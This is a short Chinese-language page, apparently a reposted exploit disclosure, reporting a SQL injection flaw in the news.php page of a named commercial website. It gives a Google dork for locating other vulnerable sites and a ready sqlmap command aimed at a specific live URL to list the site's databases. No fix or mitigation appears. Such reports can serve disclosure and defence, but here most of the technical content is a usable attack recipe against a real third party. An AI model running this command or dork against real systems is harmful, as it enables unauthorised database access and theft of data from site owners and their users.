cr-led 网站SQL注入漏洞技术分析

本文详细披露了cr-led网站新闻页面存在的SQL注入漏洞。通过使用特定Google Dork和Sqlmap工具,攻击者可获取数据库信息,构成中等风险。文章提供了完整的漏洞利用步骤与参数。

cr-led - SQL 注入

2025.12.01 提交者: javad rashidi

风险等级: 中等

本地利用:

远程利用:

CVE编号: 不适用

CWE编号: 不适用

Dork语句: inurl:“news.php?id=”

“cr-led - SQL 注入”

漏洞标题: cr-led - SQL 注入

日期: 2025-11-13

漏洞提交者: javad rashidi

测试环境: Windows, Linux

Google Dork: inurl:“news.php?id=”

Sqlmap利用命令:

sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs

查看此报告的原始版本

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次